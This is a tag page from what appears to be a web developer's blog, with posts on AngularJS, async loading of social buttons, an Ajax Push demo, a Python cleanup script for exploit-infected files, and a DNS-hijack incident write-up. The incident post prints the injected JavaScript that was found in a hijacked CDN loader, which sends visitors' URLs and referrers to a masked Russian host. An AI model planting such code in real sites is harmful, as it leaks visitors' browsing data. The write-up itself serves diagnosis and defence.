Posts Tagged ‘javascript’

AngularJS – a first step

Wednesday, September 19th, 2012

If you’ve not heard of AngularJS, I’m not surprised. It moves MVC or MV* to the browser and provides a unique, lightweight, powerful way to write apps that execute on the client side. Forms, validation, controllers, routes are all handled fairly easily.

The one thing I look for in every framework I use is a decent form library. No form library, and my interest wanes quickly. I don’t know how frameworks can claim to speed up development if you have to hand code forms, do your own validation and handle the form submission. It isn’t like you don’t expect people to input data.

The first thing with AngularJS that I ran into is the markup. While most frameworks have a template language that is executed before presentation, AngularJS’s markup is written directly in the HTML. The one thing that seems missing is the ability to do conditionals in templates. That was a design choice and a decent one to stand firm on, but, working around that to make a dynamic menu was a little complicated.

Passing things to your $scope allow you to communicate from your controller to the page. When using a controller, your urls look like http://site.com/#/page, but, if you view source, the page looks rather barren. I know Google’s searchbots can crawl the site as it did about eight minutes after I created the site.

There are a number of demos and videos and watching them gives you a fairly complete overview of AngularJS.

Development was quick. I spent a total of three days writing a quick app to familiarize myself with it and overall, the documentation is excellent, the examples are pretty good and cover a wide variety of use cases. There is a learning curve, but, the documentation is written very well, explaining the why in addition to having functional documentation.

To handle synchronous events with JavaScript’s async behavior, $q, a promise handler which works with a service was written. In your controller, you ask for a promise, hand it off to your service which resolves the promise, and your controller continues at that point, modifying the DOM on your page allowing for a very dynamic site.

Form handling is superb. Validation of fields can be handled quickly and you can even specify regexes in the HTML for extremely tight validation. Once you’ve received the data, your controller can act on that data.

Controllers and routes initially caught me off guard. When I first looked at them, I missed the ng-app specification and had to remove my controller declaration on my div from a prior iteration. Once I did that, and understood how partials worked, my app became a multipage app.

I didn’t do much DOM manipulation, but, AngularJS has quite a few powerful methods that make it quite easy. Selecting and modifying DOM elements is quick, and, with a service/controller setup, you can simply send changes through to the scope and they’ll be reflected.

Overall, my first experience with AngularJS is a positive one.

The first app I wrote was StravaPerf which utilizes the Strava API and d3.js to display graphs showing rider improvement. While Strava’s API is quite robust, I’ve run into API limits in the past, so, I use Varnish to work around the fact that JSONP isn’t supported, and, to cache the JSON responses coming back from Strava. This eliminates the need to have any backend or persistent storage. As a result, the app runs almost entirely from Varnish and only hits the backend on a cold start.

AngularJS is quite powerful and easy to use. I can see a number of potential projects that could easily be handled with it that would be extremely dynamic and interactive. This would push the edge of the web and allow app-like behavior in the browser.

A discussion of Web Site Performance – from a design perspective

Friday, March 23rd, 2012

One of the things I always run into are clients that want their site to be faster. Often times, I’m told that it is the server or MySQL slowing their site down. Today, I had a conversation with a site owner that was talking about how slow their site was.

“The site loads the first post and sits there for five seconds, then the rest of the page comes in.”

Immediately, I think, <script src=” is likely the problem.

Load the page, yes, pauses… right where the social media buttons are loaded.

Successive reloads are better, but, that one javascript include appears to always be fetched. Turns out, expire time on that javascript is set to a date in the past, therefore, always fetches regardless of modifications. And, that script doesn’t load very quickly, adding to the delay.

Disable the plugin, reload, and the site is fast. The initial reaction is, lets move those includes to async javascript. Social Media buttons don’t need to hold up the pageload – they can be rendered after the site has loaded. It might look a little funny, but, most of the social media buttons are below the fold anyhow, and, we’re trying to get the site to display quickly.

There is a difference between the page being slow and the page rendering slowly. The latter is what most people will see and make a judgement that the site is slow. So, the first thing we need to do is move things to async. As an example, the social media buttons on this site are loaded by my cd34-social plugin.

But, the meat of the conversion to async is here:

<script type="text/javascript">
<!--
var a=["https://apis.google.com/js/plusone.js","http://platform.twitter.com/widgets.js","http://connect.facebook.net/en_US/all.js#xfbml=1"];for(script_index in a){var b=document.createElement("script");b.type="text/javascript";b.async=!0;b.src=a[script_index];var c=document.getElementsByTagName("script")[0];c.parentNode.insertBefore(b,c)};
// -->
</script>

What this code does is load https://apis.google.com/js/plusone.js, http://platform.twitter.com/widgets.js and http://connect.facebook.net/en_US/all.js#xfbml=1 after the page has loaded, and inserts it before itself.

This will make the social buttons load after the page has loaded, but, won’t hold up the page rendering.

However, this isn’t the only issue we’ve run into. The plugin they used, includes its own social media buttons. The plugin should use CSS sprites which are large images that contain a bar or matrix of icons where you use CSS positioning to move that image around and display only a portion of it. This way, you fetch one image rather than the 16 social media buttons and the 16 social media button hover images, and use CSS to move that image around and display the right icon out of the graphic.

Here are a collection of those sprites as used by Google, Facebook, Twitter and Twitter’s Bootstrap template:

With these sprites, you save the overhead of multiple fetches for each icon, and, present a much quicker overall experience for the surfer.

Not everything can be solved with low latency webservers, some performance problems are on the browser/rendering side.

Ajax Push Engine, Pyramid and a quick demo application

Wednesday, January 11th, 2012

Earlier today I was debating Ajax Push and Pyramid for a project I had in mind. I ended up spending about 45 minutes writing a quick proof of concept, then, decided that perhaps something a bit more detailed with some documentation would be helpful for others.

I used Pyramid and APE and wrote a quick demo app. All of the code for the demo app can be downloaded from http://code.google.com/p/pyramid-ape-demo/.

In the html/ directory, the files, graphics and javascript files required to run the client side of the app are included. In the ape_server/ directory, the javascript that needs to be installed in the Ape Server scripts/ directory is present. You’ll want to modify the password. Also included in the html/ directory is a python script called push.py which allows you to use urllib2.urlopen to communicate with the server directly. And finally, in the ape/ directory is a very minimal Pyramid application. pyramidape.wsgi is also included as a starting point to get the site set up.

In the demo, the left hand Coke can is controlled completely by the Ape Javascript Client code. Communications between the browser and Ape server are not processed by anything but Ape. On the right hand side, the Coke can is controlled by a json post to Pyramid and then Pyramid uses urllib2.urlopen to communicate with Ape which then updates the page.

Changes made on the page are reflected among all of the other people that are currently viewing the page in realtime. Since we’re using Ajax push, the page doesn’t need to be reloaded to show those changes. In this example, an img src and the alt text is changed along with a button. You can write your script to modify any html on the page – changing the colors of the page, elements, etc.

Using Ajax push and long polling with Pyramid isn’t difficult and this simple demo and example code should be a good starting point.

Quick Python search and replace script

Friday, October 28th, 2011

Have a client machine that is a little loaded that has a ton of modified files. Normally we just restore off the last backup or the previous generation backup, but, over 120k files since June 2011 have been exploited. Since the machine is doing quite a bit of work, we need to throttle our replacements so that we don’t kill the server.

#!/usr/bin/python
"""

Quick search and replace to replace an exploit on a client's site while
trying to keep the load disruption on the machine to a minimum.

Replace the variable exploit with the code to be replaced. By default, 
this script starts at the current directory. max_load controls our five
second sleep until the load drops.

"""

import glob
import os
import re
import time

path = '.'
max_load = 10

exploit = """
<script>var i,y,x="3cblahblahblah3e";y='';for(i=0;i
""".strip()

file_exclude = re.compile('\.(gif|jpe?g|swf|css|js|flv|wmv|mp3|mp4|pdf|ico|png|zip)$', \
                          re.IGNORECASE)

def check_load():
    load_avg = int(os.getloadavg()[0])
    while load_avg > max_load:
        time.sleep(30)
        load_avg = int(os.getloadavg()[0])

def getdir(path):
    check_load()
    for file in os.listdir(path):
        file_path = os.path.join(path,file)
        if os.path.isdir(file_path):
            getdir(file_path)
        else:
            if not file_exclude.search(file_path):
                process_file(file_path)

def process_file(file_path):
    file = open(file_path, 'r+')
    contents = file.read()
    if exploit in contents:
        print 'fixing:', file_path
        contents = contents.replace(exploit, '')
        file.truncate(0)
        file.seek(0, os.SEEK_SET )
        file.write(contents)
    file.close()

getdir(path)

Thankfully, since this server is run as www-data rather than SetUID, the damage wasn’t as bad as it could have been.

Man in the Middle Attack

Sunday, October 10th, 2010

A few days ago a client had a window opened up in their browser with an Ip address and a query string parameter with his domain name. He asked me if his wordpress site had been hacked. I took a look through the files on the disk, dumped the database and did a grep, looked around the site using Chrome, Firefox and Safari and saw nothing. I even used Firefox to view generated source as sometimes scripts utilize the fact that JQuery is already loaded to load their extra payload through a template or addon.

Nothing. He runs a mac, his wife was having the same issue. I recalled the issue with the recent Adobe Flash plugin, but, he said something that was very confusing – our IPad’s do it too.

No Flash on IPad, can’t install most of the toolbar code on the IPad due to a fairly tight sandbox and the same behavior across multiple machines. Even machines that weren’t accessing his site were popping up windows/tabs in Safari.

I had him check his System Preferences, TCP/IP and the DNS settings and he read the numbers. The last one of 1.1.1.1 seemed odd, but, wouldn’t normally cause an issue since 1.0.0.0/8 isn’t routed. The other two DNS server IPs were read off and written down. Doing a reverse IP lookup resulted in a Not Found. Since he was on RoadRunner, I found that a bit odd, so, I did a whois and found out that both of the IP addresses listed as DNS were hosted in Russia.

Now we’re getting somewhere. The settings on his machine were grabbed from DHCP, so, that meant his router was probably set to use those servers. Sure enough, we logged in with the default username/password of admin/password, looked at the first page and there they were. We modified them to use google’s resolvers and changed the password on the router to something a little more secure.

We checked a few settings in the Linksys router and remote web access wasn’t enabled, so, the only way it could have happened is a Javascript exploit that logged into the router and made the changes. However, now the fun began. Trying to figure out what was actually intercepted. Since I had a source site that I knew caused issues, through some quick investigative work, we find a number of external URLs loaded on his site that might be common enough and small enough to be of interest. Since we know that particular scripts require jQuery, we can look at anything that calls something external in his source.

First thought was the Twitter sidebar, but, that calls Twitter directly which means all of that traffic would have to be proxied. Certainly wouldn’t want to do that when you have limited bandwidth. Feedburner seemed like a potential vector, but, probably very limited access and those were hrefs, so, they would have had to have been followed. The Feedburner widget wasn’t present. Bookmarklet.amplify.com seemed like a reasonable target, but, the DNS for it through the Russian DNS servers and other resolvers was the same. That isn’t to say that they couldn’t change it on a per request basis to balance for traffic, but, we’re going on the assumption it’ll be a fire and forget operation.

After looking through, statcounter could have been a suspect, but, again the DNS entries appeared to be the same, however, it does fit the criteria of a small javascript on a page that might have jquery.

However, the next entry appeared to be a good candidate. cdn.wibiya.com which requires jquery and loads a small javascript. DNS entries are different – though, we could attribute that to the fact it is a CDN, but, we get a CNAME from google’s resolvers, and an IN A record from the suspect DNS servers.

The Loader.js contains a tiny bit of extra code at the bottom containing:

var xxxxxx_html = '';
    xxxxxx_html += '<scr ' + 'ipt language="JavaSc' + 'ript" ';
    xxxxxx_html += 'src="http://xx' + 'xxxx.ru/js.php?id=36274';
    xxxxxx_html += '&dd=3&url=' + encodeURIComponent(document.location);
    xxxxxx_html += '&ref=' + encodeURIComponent(document.referrer);
    xxxxxx_html += '&rnd=' + Math.random() + '"></scr>';
    document.write(xxxxxx_html);

I did a few checks to see if I could find any other hostnames that they had filtered, but, wasn’t able to find anything with a quick glance. Oh, and these guys minified the javascript – even though wibiya didn’t. And no, the server hosting the content was in the USA, only the DNS server was outside the USA.

After years of reading about this type of attack, it is the first time I was able to witness it first-hand.

Entries (RSS) and Comments (RSS).
Cluster host: li